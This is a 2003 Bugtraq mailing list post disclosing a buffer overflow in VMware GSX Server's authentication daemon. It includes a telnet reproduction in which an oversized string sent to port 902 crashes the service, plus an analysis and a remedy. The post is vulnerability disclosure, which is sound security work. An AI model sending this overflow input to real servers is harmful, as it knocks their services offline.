|
Bugtraq
mailing list archives
VMWare GSX Server Authentication Server Buffer Overflow Vulnerability - Update
From: Darryl Swofford <dswofford () kpmg com>
Date: 31 Oct 2003 16:28:55 -0000
Author: Darryl Swofford
Email: dswofford () kpmg com
Date: 2003/10/31
System:
VMware GSX Server 2.0.1 build-2129 for Windows (other versions not tested). Tested on Windows NT/2000/2003/XP systems.
Description:
After reviewing BugTaq #5294 (VMWare GSX Server Authentication Server Buffer Overflow Vulnerability) I was able to
modify the sample code to exploit the updated vmware-authd service.
I will not release the source code as I feel this is not prudent until the vendor acknowledges the issue. Until then
you can view the overflow by using telnet with the following syntax and simply alter the code as I did.
telnet VMserver.somecompany.com 902
220 VMware Authentication Daemon Version 1.00
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA599
vmware-authd
PANIC: Buffer overflow in VMAuthdSocketRead()
Connection to host lost.
Analyses:
It seems that the vmware-authd service limits the input strings of the program when passed correct arguments (USER,
PASS, GLOBAL); however the initial readline can be overflowed as it does not control the amount of data passed to it.
Remedy:
Stop and disable the VMware authorization service.
 By Date 
By Thread
Current thread:
- VMWare GSX Server Authentication Server Buffer Overflow Vulnerability - Update Darryl Swofford (Oct 31)
| 
Intro
